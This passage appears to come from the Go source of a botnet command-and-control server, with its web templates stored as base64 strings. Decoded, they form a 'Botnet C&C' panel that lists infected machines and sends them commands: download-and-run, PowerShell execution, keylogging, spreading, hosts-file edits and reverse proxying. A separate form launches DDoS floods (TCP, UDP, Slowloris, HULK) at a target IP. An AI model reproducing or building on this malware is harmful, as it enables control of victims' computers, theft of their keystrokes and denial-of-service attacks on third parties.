IgY2xhc3M9InB1cmUtbWVudS1saW5rIj5XaUZpIEluZm9ybWF0aW9uPC9hPgoJPC9kaXY+CjwvZm9ybT4KPC9kaXY+CjwvYm9keT4=`)

	botTableHTML string = base64Decode(`IDx0Ym9keT4KICAgICAgICA8dHIgY2xhc3M9InB1cmUtdGFibGUtb2RkIj4KCQkJPHRkPjxpbnB1dCBuYW1lPSJzZWxlY3RlZGJvdCIgdHlwZT0iY2hlY2tib3giIHZhbHVlPSJ7R1VJRH0iPjwvdGQ+CiAgICAgICAgICAgIDx0ZD48YSBocmVmPSIuL2ZpbGVzL3tHVUlEfSI+e0dVSUR9PC9hPjwvdGQ+CiAgICAgICAgICAgIDx0ZD48YSBocmVmPSJodHRwczovL25vcmVmZXJyYWwubmV0Lz9odHRwOi8ve0lQfS5pcGFkZHJlc3MuY29tIj57SVB9PC9hPjwvdGQ+CiAgICAgICAgICAgIDx0ZD57V0hPQU1JfTwvdGQ+CiAgICAgICAgICAgIDx0ZD57T1N9PC90ZD4KCQkJPHRkPntBRE1JTn08L3RkPgoJCQk8dGQ+e0xBU0RBVEV9PC90ZD4KCQkJPHRkPjxhIGhyZWY9Ii9pbmZvP2d1aWQ9e0dVSUR9Ij48aSBjbGFzcz0iZmEgZmEtaWQtY2FyZC1vIGZhLTJ4Ij48L2k+PC9hPjwvdGQ+CiAgICAgICAgPC90cj4KICAgIDwvdGJvZHk+`)
	panelHTML    string = base64Decode(`PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KCiAgICA8dGl0bGU+Qm90bmV0IEMmQzogQ29udHJvbCBQYW5lbDwvdGl0bGU+CgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwOi8veXVpLnlhaG9vYXBpcy5jb20vcHVyZS8wLjYuMC9wdXJlLW1pbi5jc3MiPgoJPHNjcmlwdCBzcmM9Imh0dHBzOi8vdXNlLmZvbnRhd2Vzb21lLmNvbS9lM2U2YTM5OGRmLmpzIj48L3NjcmlwdD4KCQoJPHN0eWxlPgpib2R5IHsKICBiYWNrZ3JvdW5kOiAjNzZiODUyOyAvKiBmYWxsYmFjayBmb3Igb2xkIGJyb3dzZXJzICovCiAgYmFja2dyb3VuZDogLXdlYmtpdC1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IC1tb3otbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiAtby1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCh0byBsZWZ0LCAjNzZiODUyLCAjOERDMjZGKTsKICAtd2Via2l0LWZvbnQtc21vb3RoaW5nOiBhbnRpYWxpYXNlZDsKICAtbW96LW9zeC1mb250LXNtb290aGluZzogZ3JheXNjYWxlOyAgICAgIAp9CiAgICAgICAgLmJ1dHRvbi1zdWNjZXNzLAogICAgICAgIC5idXR0b24tZXJyb3IsCiAgICAgICAgLmJ1dHRvbi13YXJuaW5nLAogICAgICAgIC5idXR0b24tc2Vjb25kYXJ5IHsKICAgICAgICAgICAgY29sb3I6IHdoaXRlOwogICAgICAgICAgICBib3JkZXItcmFkaXVzOiA0cHg7CiAgICAgICAgICAgIHRleHQtc2hhZG93OiAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjIpOwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLXN1Y2Nlc3MgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoMjgsIDE4NCwgNjUpOyAvKiB0aGlzIGlzIGEgZ3JlZW4gKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi1lcnJvciB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYigyMDIsIDYwLCA2MCk7IC8qIHRoaXMgaXMgYSBtYXJvb24gKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi13YXJuaW5nIHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDIyMywgMTE3LCAyMCk7IC8qIHRoaXMgaXMgYW4gb3JhbmdlICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24tc2Vjb25kYXJ5IHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDY2LCAxODQsIDIyMSk7IC8qIHRoaXMgaXMgYSBsaWdodCBibHVlICovCiAgICAgICAgfQoJCSAgKiB7IG1hcmdpbjogMDsgcGFkZGluZzogMDsgfQoJICAgcCB7IHBhZGRpbmc6IDEwcHg7IH0KCSAgICNsZWZ0IHsgcG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAwOyAgd2lkdGg6IDUwJTsgfQoJICAgI3JpZ2h0IHsgcG9zaXRpb246IGFic29sdXRlOyByaWdodDogMDsgIHdpZHRoOiA1MCU7IH0KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGRpdiBjbGFzcz0icHVyZS1tZW51IHB1cmUtbWVudS1ob3Jpem9udGFsIiBhbGlnbj0iY2VudGVyIj4KICAgIDx1bCBjbGFzcz0icHVyZS1tZW51LWxpc3QiPgoJPHNwYW4gY2xhc3M9InB1cmUtbWVudS1oZWFkaW5nIiBhbGlnbj0ibGVmdCI+Qm90bmV0IEMmQzwvc3Bhbj4KICAgICAgICA8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIHB1cmUtbWVudS1zZWxlY3RlZCI+PGEgaHJlZj0iLi9wYW5lbCIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5Db250cm9sIFBhbmVsPC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtc2VsZWN0ZWQiPjxhIGhyZWY9Ii4vZmlsZXMiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+RmlsZSBCcm93c2VyPC9hPjwvbGk+CgkJPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtaGFzLWNoaWxkcmVuIHB1cmUtbWVudS1hbGxvdy1ob3ZlciI+CiAgICAgICAgICAgIDxhIGlkPSJtZW51TGluazEiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+VXNlciBNYW5hZ21lbnQ8L2E+CiAgICAgICAgICAgIDx1bCBjbGFzcz0icHVyZS1tZW51LWNoaWxkcmVuIj4KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0iPjxhIGhyZWY9Ii4vbG9nb3V0IiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPkxvZ291dDwvYT48L2xpPgogICAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk+CiAgICA8L3VsPgo8L2Rpdj4KPGJyPgo8YnI+CjxkaXYgYWxpZ249ImNlbnRlciI+PGgyPkNvbnRyb2wgUGFuZWw8L2gyPjwvZGl2Pgo8YnI+CntTVEFUU30KPGJyPgo8Zm9ybSBjbGFzcz0icHVyZS1mb3JtIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iLi9zZW5kY21kIj4KPGRpdiBhbGlnbj0iY2VudGVyIj4KPHRhYmxlIGNsYXNzPSJwdXJlLXRhYmxlIiBhbGlnbj0iY2VudGVyIj4KICAgIDx0aGVhZD4KICAgICAgICA8dHI+CgkJCTx0aD48L3RoPgogICAgICAgICAgICA8dGg+R1VJRDwvdGg+CiAgICAgICAgICAgIDx0aD5JUDwvdGg+CiAgICAgICAgICAgIDx0aD5XSE8gQU0gSTwvdGg+CiAgICAgICAgICAgIDx0aD5PUzwvdGg+CgkJCTx0aD5BRE1JTiBSSUdIVFM8L3RoPgoJCQk8dGg+TEFTVCBDSEVDSy1JTjwvdGg+CgkJCTx0aD48L3RoPgogICAgICAgIDwvdHI+CiAgICA8L3RoZWFkPgogICB7UkFXVEFCTEV9CjwvdGFibGU+Cjxicj4KPGRpdiBpZD0ibGVmdCIgYWxpZ249ImNlbnRlciI+Cgk8YSBjbGFzcz0iYnV0dG9uLXN1Y2Nlc3MgcHVyZS1idXR0b24iIGhyZWY9Ij9wYWdlPXtCQUNLfSI+PGkgY2xhc3M9ImZhIGZhLWFycm93LWxlZnQgZmEtbGciPjwvaT4gIFByZXZpb3VzPC9hPgo8L2Rpdj4KPGRpdiBpZD0icmlnaHQiIGFsaWduPSJjZW50ZXIiPgoJPGEgY2xhc3M9ImJ1dHRvbi1zdWNjZXNzIHB1cmUtYnV0dG9uIiBocmVmPSI/cGFnZT17TkVYVH0iPk5leHQgIDxpIGNsYXNzPSJmYSBmYS1hcnJvdy1yaWdodCBmYS1sZyI+PC9pPjwvYT4KPC9kaXY+CjwvZGl2Pgo8YnI+Cjxicj4KPGJyPgo8ZGl2IGlkPSJyaWdodCIgYWxpZ249ImNlbnRlciI+CiAgICA8ZmllbGRzZXQgY2xhc3M9InB1cmUtZ3JvdXAiPgoJPGxlZ2VuZD5Db21tYW5kPC9sZWdlbmQ+CiAgICAgICAgIDxzZWxlY3QgaWQ9ImJvdHNzZWxlY3Rpb24iIG5hbWU9ImJvdHNzZWxlY3Rpb24iIGNsYXNzPSJwdXJlLWlucHV0LTEtMiI+CiAgICAgICAgICAgICAgICAgICAgPG9wdGlvbiB2YWx1ZT0iMDAwIj5BbGw8L29wdGlvbj4KICAgICAgICAgICAgICAgICAgICA8b3B0aW9uIHZhbHVlPSJzZWxlY3RlZCI+U2VsZWN0ZWQ8L29wdGlvbj4KICAgICAgICAgICAgICAgIDwvc2VsZWN0PgogICAgICAgIDxzZWxlY3QgaWQ9ImNvbW1hbmR0eXBlIiBuYW1lPSJjb21tYW5kdHlwZSIgY2xhc3M9InB1cmUtaW5wdXQtMS0yIj4KICAgICAgICAgICAgICAgICAgICA8b3B0aW9uIHZhbHVlPSIweDEiPk9wZW4gVVJMPC9vcHRpb24+CiAgICAgICAgICAgICAgICAgICAgPG9wdGlvbiB2YWx1ZT0iMHgyIj5SdW4gQXBwbGljYXRpb248L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIweDUiPkRvd25sb2FkIGFuZCBSdW48L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIyeDQiPkVuYWJsZS9EaXNhYmxlIEtleWxvZ2dlcjwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjB4MCI+S2lsbCBNZTwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjB4NiI+UnVuIFBvd2Vyc2hlbGw8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIweDciPlNwcmVhZGVyPC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iMHg4Ij5TdGFydCBXZWJzZXJ2ZXI8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIweDkiPkVkaXQgV2Vic2VydmVyIFBhZ2U8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIxeDAiPkhpZGUgUHJvY2VzcyBXaW5kb3c8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIxeDEiPlNlZWQgVG9ycmVudDwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjF4MiI+U3lzdGVtIFBvd2VyIE9wdGlvbnM8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIxeDMiPlNldCBIb21lcGFnZTwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjF4NCI+U2V0IFdhbGxwYXBlcjwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjF4NSI+RWRpdCBIT1NUIEZpbGU8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIxeDYiPlVuaW5zdGFsbCBNZTwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjF4NyI+T3BlbiBQb3J0PC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iMXg4Ij5SdW4gU2NyaXB0PC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iMXg5Ij5SdW4gQ29tbWFuZDwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjJ4MCI+RW5hYmxlIFJldmVyc2UgUHJveHkgU2VydmVyPC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iMngxIj5QdXNoIEZpbGUgdG8gQ2xpZW50PC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iMngyIj5LaWxsIFByb2Nlc3M8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIyeDMiPlVwZGF0ZSBDbGllbnQ8L29wdGlvbj4KICAgICAgICAgICAgICAgIDwvc2VsZWN0PgogICAgPC9maWVsZHNldD4KCiAgICA8ZmllbGRzZXQgY2xhc3M9InB1cmUtZ3JvdXAiPgogICAgICAgIDx0ZXh0YXJlYSBpZD0iYXJnMSIgbmFtZT0iYXJnMSIgY2xhc3M9InB1cmUtaW5wdXQtMS0yIiBwbGFjZWhvbGRlcj0iQXJndW1lbnRzIj48L3RleHRhcmVhPgoJCTxicj4KCQkgVXNlICd8JyB0byBzcGxpdCBBcmd1bWVudHMKICAgIDwvZmllbGRzZXQ+CgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJwdXJlLWJ1dHRvbiBwdXJlLWlucHV0LTEtMiBwdXJlLWJ1dHRvbi1wcmltYXJ5Ij48aSBjbGFzcz0iZmEgZmEtcG9kY2FzdCBmYS1sZyI+PC9pPiAgU2VuZCBDb21tYW5kPC9idXR0b24+IDxhIGNsYXNzPSJidXR0b24tc2Vjb25kYXJ5IHB1cmUtYnV0dG9uIiBocmVmPSIuL3JlZnJlc2g/Z3VpZD17R1VJRH0iPjxpIGNsYXNzPSJmYSBmYS1yZWZyZXNoIGZhLWxnIj48L2k+ICBSZWZyZXNoIEluZm88L2E+CjwvZm9ybT4KPC9kaXY+CjxkaXYgaWQ9ImxlZnQiIGFsaWduPSJjZW50ZXIiPgo8Zm9ybSBjbGFzcz0icHVyZS1mb3JtIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iLi9jbWRkZG9zIj4KPGZpZWxkc2V0IGNsYXNzPSJwdXJlLWdyb3VwIj4KPGxlZ2VuZD5ERG9TIEF0dGFjazwvbGVnZW5kPgogICAgICAgICA8c2VsZWN0IGlkPSJkZG9zbW9kZSIgbmFtZT0iZGRvc21vZGUiIGNsYXNzPSJwdXJlLWlucHV0LTEtMiI+CiAgICAgICAgICAgICAgICAgICAgPG9wdGlvbiB2YWx1ZT0iMCI+SFRUUCBHZXQ8L29wdGlvbj4KICAgICAgICAgICAgICAgICAgICA8b3B0aW9uIHZhbHVlPSI1Ij5UQ1AgRmxvb2Q8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSI0Ij5VRFAgRmxvb2Q8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIxIj5TbG93bG9yaXM8L29wdGlvbj4KCQkJCQk8b3B0aW9uIHZhbHVlPSIyIj5IVUxLPC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iMyI+VExTIEZsb29kPC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iNyI+QmFuZHdpZHRoIERyYWluPC9vcHRpb24+CgkJCQkJPG9wdGlvbiB2YWx1ZT0iNiI+R29sZGVuIEV5ZTwvb3B0aW9uPgoJCQkJCTxvcHRpb24gdmFsdWU9IjgiPkFjZTwvb3B0aW9uPgogICAgICAgICAgICAgICAgPC9zZWxlY3Q+CgkJCQk8L2ZpZWxkc2V0PgogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpcCIgY2xhc3M9InB1cmUtaW5wdXQtMS0yIiBwbGFjZWhvbGRlcj0iMTI3LjAuMC4xIj4KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icG9ydCIgY2xhc3M9InB1cmUtaW5wdXQtMS0yIiBwbGFjZWhvbGRlcj0iODAiPgoJCTxmaWVsZHNldCBjbGFzcz0icHVyZS1ncm91cCI+CiAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InRocmVhZHMiIGNsYXNzPSJwdXJlLWlucHV0LTEtMiIgcGxhY2Vob2xkZXI9IlRocmVhZHMgMTAwMCI+CgkJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImludGVydmFsIiBjbGFzcz0icHVyZS1pbnB1dC0xLTIiIHBsYWNlaG9sZGVyPSJJbnRlcnZhbCA1MDAgKiBNaWxsaXNlY29uZHMiPgoJCTxicj4KCQkgRERvUyBBdHRhY2tzIHV0aWxpemUgYWxsIGJvdHMKCQk8L2ZpZWxkc2V0PgogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJwdXJlLWJ1dHRvbiBwdXJlLWlucHV0LTEtMiBwdXJlLWJ1dHRvbi1wcmltYXJ5Ij48aSBjbGFzcz0iZmEgZmEtcG9kY2FzdCBmYS1sZyI+PC9pPiAgU2VuZCBDb21tYW5kPC9idXR0b24+IDxhIGNsYXNzPSJidXR0b24tZXJyb3IgcHVyZS1idXR0b24iIGhyZWY9Ii4vc3RvcGRkb3MiPjxpIGNsYXNzPSJmYSBmYS1zdG9wIGZhLWxnIj48L2k+ICBTdG9wIEF0dGFjazwvYT4KPC9kaXY+CjwvZm9ybT4KCjwvYm9keT4=`)

	errorHTML   string = base64Decode(`PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KCiAgICA8dGl0bGU+Qm90bmV0IEMmQzogRXJyb3I8L3RpdGxlPgoKICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cDovL3l1aS55YWhvb2FwaXMuY29tL3B1cmUvMC42LjAvcHVyZS1taW4uY3NzIj4KCQoJPHN0eWxlPgpib2R5IHsKICBiYWNrZ3JvdW5kOiAjNzZiODUyOyAvKiBmYWxsYmFjayBmb3Igb2xkIGJyb3dzZXJzICovCiAgYmFja2dyb3VuZDogLXdlYmtpdC1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IC1tb3otbGluZWFyLWdyYWRpZW50KHJpZ2h0LCAjNzZiODUyLCAjOERDMjZGKTsKICBiYWNrZ3JvdW5kOiAtby1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCh0byBsZWZ0LCAjNzZiODUyLCAjOERDMjZGKTsKICAtd2Via2l0LWZvbnQtc21vb3RoaW5nOiBhbnRpYWxpYXNlZDsKICAtbW96LW9zeC1mb250LXNtb290aGluZzogZ3JheXNjYWxlOyAgICAgIAp9CiAgICAgICAgLmJ1dHRvbi1zdWNjZXNzLAogICAgICAgIC5idXR0b24tZXJyb3IsCiAgICAgICAgLmJ1dHRvbi13YXJuaW5nLAogICAgICAgIC5idXR0b24tc2Vjb25kYXJ5IHsKICAgICAgICAgICAgY29sb3I6IHdoaXRlOwogICAgICAgICAgICBib3JkZXItcmFkaXVzOiA0cHg7CiAgICAgICAgICAgIHRleHQtc2hhZG93OiAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjIpOwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLXN1Y2Nlc3MgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoMjgsIDE4NCwgNjUpOyAvKiB0aGlzIGlzIGEgZ3JlZW4gKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi1lcnJvciB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYigyMDIsIDYwLCA2MCk7IC8qIHRoaXMgaXMgYSBtYXJvb24gKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi13YXJuaW5nIHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDIyMywgMTE3LCAyMCk7IC8qIHRoaXMgaXMgYW4gb3JhbmdlICovCiAgICAgICAgfQogICAgICAgIC5idXR0b24tc2Vjb25kYXJ5IHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDY2LCAxODQsIDIyMSk7IC8qIHRoaXMgaXMgYSBsaWdodCBibHVlICovCiAgICAgICAgfQoJCSAgKiB7IG1hcmdpbjogMDsgcGFkZGluZzogMDsgfQoJICAgcCB7IHBhZGRpbmc6IDEwcHg7IH0KCSAgICNsZWZ0IHsgcG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAwOyAgd2lkdGg6IDUwJTsgfQoJICAgI3JpZ2h0IHsgcG9zaXRpb246IGFic29sdXRlOyByaWdodDogMDsgIHdpZHRoOiA1MCU7IH0KPC9zdHlsZT4KCjwvaGVhZD4KCjxib2R5Pgo8ZGl2IGNsYXNzPSJwdXJlLW1lbnUgcHVyZS1tZW51LWhvcml6b250YWwiIGFsaWduPSJjZW50ZXIiPgogICAgPHVsIGNsYXNzPSJwdXJlLW1lbnUtbGlzdCI+Cgk8c3BhbiBjbGFzcz0icHVyZS1tZW51LWhlYWRpbmciIGFsaWduPSJsZWZ0Ij5Cb3RuZXQgQyZDPC9zcGFuPgogICAgICAgIDxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0gcHVyZS1tZW51LXNlbGVjdGVkIj48YSBocmVmPSIuL3BhbmVsIiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPkNvbnRyb2wgUGFuZWw8L2E+PC9saT4KCQk8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIHB1cmUtbWVudS1zZWxlY3RlZCI+PGEgaHJlZj0iLi9maWxlcyIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5GaWxlIEJyb3dzZXI8L2E+PC9saT4KCQk8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIHB1cmUtbWVudS1oYXMtY2hpbGRyZW4gcHVyZS1tZW51LWFsbG93LWhvdmVyIj4KICAgICAgICAgICAgPGEgaWQ9Im1lbnVMaW5rMSIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5Vc2VyIE1hbmFnbWVudDwvYT4KICAgICAgICAgICAgPHVsIGNsYXNzPSJwdXJlLW1lbnUtY2hpbGRyZW4iPgogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSI+PGEgaHJlZj0iLi9sb2dvdXQiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+TG9nb3V0PC9hPjwvbGk+CiAgICAgICAgICAgIDwvdWw+CiAgICAgICAgPC9saT4KICAgIDwvdWw+CjwvZGl2Pgo8YnI+Cjxicj4KPGRpdiBhbGlnbj0iY2VudGVyIj48aDI+RXJyb3I6IHtFUlJPUn08L2gyPjwvZGl2Pgo8YnI+CntTVEFUU30KPGJyPgo8ZGl2IGFsaWduPSJjZW50ZXIiPgo8YSBjbGFzcz0iYnV0dG9uLWVycm9yIHB1cmUtYnV0dG9uIiBocmVmPSIuL3BhbmVsIj57RVJST1J9IFJldHVybiB0byBDb250cm9sIFBhbmVsPC9hPgo8L2Rpdj4KPC9ib2R5Pgo8L2h0bWw+`)
	successHTML string = base64Decode(`PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KCiAgICA8dGl0bGU+Qm90bmV0IEMmQzogU3VjY2VzczwvdGl0bGU+CgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwOi8veXVpLnlhaG9vYXBpcy5jb20vcHVyZS8wLjYuMC9wdXJlLW1pbi5jc3MiPgoJCgk8c3R5bGU+CmJvZHkgewogIGJhY2tncm91bmQ6ICM3NmI4NTI7IC8qIGZhbGxiYWNrIGZvciBvbGQgYnJvd3NlcnMgKi8KICBiYWNrZ3JvdW5kOiAtd2Via2l0LWxpbmVhci1ncmFkaWVudChyaWdodCwgIzc2Yjg1MiwgIzhEQzI2Rik7CiAgYmFja2dyb3VuZDogLW1vei1saW5lYXItZ3JhZGllbnQocmlnaHQsICM3NmI4NTIsICM4REMyNkYpOwogIGJhY2tncm91bmQ6IC1vLWxpbmVhci1ncmFkaWVudChyaWdodCwgIzc2Yjg1MiwgIzhEQzI2Rik7CiAgYmFja2dyb3VuZDogbGluZWFyLWdyYWRpZW50KHRvIGxlZnQsICM3NmI4NTIsICM4REMyNkYpOwogIC13ZWJraXQtZm9udC1zbW9vdGhpbmc6IGFudGlhbGlhc2VkOwogIC1tb3otb3N4LWZvbnQtc21vb3RoaW5nOiBncmF5c2NhbGU7ICAgICAgCn0KICAgICAgICAuYnV0dG9uLXN1Y2Nlc3MsCiAgICAgICAgLmJ1dHRvbi1lcnJvciwKICAgICAgICAuYnV0dG9uLXdhcm5pbmcsCiAgICAgICAgLmJ1dHRvbi1zZWNvbmRhcnkgewogICAgICAgICAgICBjb2xvcjogd2hpdGU7CiAgICAgICAgICAgIGJvcmRlci1yYWRpdXM6IDRweDsKICAgICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMik7CiAgICAgICAgfQogICAgICAgIC5idXR0b24tc3VjY2VzcyB7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHJnYigyOCwgMTg0LCA2NSk7IC8qIHRoaXMgaXMgYSBncmVlbiAqLwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLWVycm9yIHsKICAgICAgICAgICAgYmFja2dyb3VuZDogcmdiKDIwMiwgNjAsIDYwKTsgLyogdGhpcyBpcyBhIG1hcm9vbiAqLwogICAgICAgIH0KICAgICAgICAuYnV0dG9uLXdhcm5pbmcgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoMjIzLCAxMTcsIDIwKTsgLyogdGhpcyBpcyBhbiBvcmFuZ2UgKi8KICAgICAgICB9CiAgICAgICAgLmJ1dHRvbi1zZWNvbmRhcnkgewogICAgICAgICAgICBiYWNrZ3JvdW5kOiByZ2IoNjYsIDE4NCwgMjIxKTsgLyogdGhpcyBpcyBhIGxpZ2h0IGJsdWUgKi8KICAgICAgICB9CgkJICAqIHsgbWFyZ2luOiAwOyBwYWRkaW5nOiAwOyB9CgkgICBwIHsgcGFkZGluZzogMTBweDsgfQoJICAgI2xlZnQgeyBwb3NpdGlvbjogYWJzb2x1dGU7IGxlZnQ6IDA7ICB3aWR0aDogNTAlOyB9CgkgICAjcmlnaHQgeyBwb3NpdGlvbjogYWJzb2x1dGU7IHJpZ2h0OiAwOyAgd2lkdGg6IDUwJTsgfQo8L3N0eWxlPgoKPC9oZWFkPgoKPGJvZHk+CjxkaXYgY2xhc3M9InB1cmUtbWVudSBwdXJlLW1lbnUtaG9yaXpvbnRhbCIgYWxpZ249ImNlbnRlciI+CiAgICA8dWwgY2xhc3M9InB1cmUtbWVudS1saXN0Ij4KCTxzcGFuIGNsYXNzPSJwdXJlLW1lbnUtaGVhZGluZyIgYWxpZ249ImxlZnQiPkJvdG5ldCBDJkM8L3NwYW4+CiAgICAgICAgPGxpIGNsYXNzPSJwdXJlLW1lbnUtaXRlbSBwdXJlLW1lbnUtc2VsZWN0ZWQiPjxhIGhyZWY9Ii4vcGFuZWwiIGNsYXNzPSJwdXJlLW1lbnUtbGluayI+Q29udHJvbCBQYW5lbDwvYT48L2xpPgoJCTxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0gcHVyZS1tZW51LXNlbGVjdGVkIj48YSBocmVmPSIuL2ZpbGVzIiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPkZpbGUgQnJvd3NlcjwvYT48L2xpPgoJCTxsaSBjbGFzcz0icHVyZS1tZW51LWl0ZW0gcHVyZS1tZW51LWhhcy1jaGlsZHJlbiBwdXJlLW1lbnUtYWxsb3ctaG92ZXIiPgogICAgICAgICAgICA8YSBpZD0ibWVudUxpbmsxIiBjbGFzcz0icHVyZS1tZW51LWxpbmsiPlVzZXIgTWFuYWdtZW50PC9hPgogICAgICAgICAgICA8dWwgY2xhc3M9InB1cmUtbWVudS1jaGlsZHJlbiI+CiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9InB1cmUtbWVudS1pdGVtIj48YSBocmVmPSIuL2xvZ291dCIgY2xhc3M9InB1cmUtbWVudS1saW5rIj5Mb2dvdXQ8L2E+PC9saT4KICAgICAgICAgICAgPC91bD4KICAgICAgICA8L2xpPgogICAgPC91bD4KPC9kaXY+Cjxicj4KPGJyPgo8ZGl2IGFsaWduPSJjZW50ZXIiPjxoMj5TdWNjZXNzOiB7TUVTU0FHRX08L2gyPjwvZGl2Pgo8YnI+CntTVEFUU30KPGJyPgo8ZGl2IGFsaWduPSJjZW50ZXIiPgo8YSBjbGFzcz0iYnV0dG9uLXN1Y2Nlc3MgcHVyZS1idXR0b24iIGhyZWY9I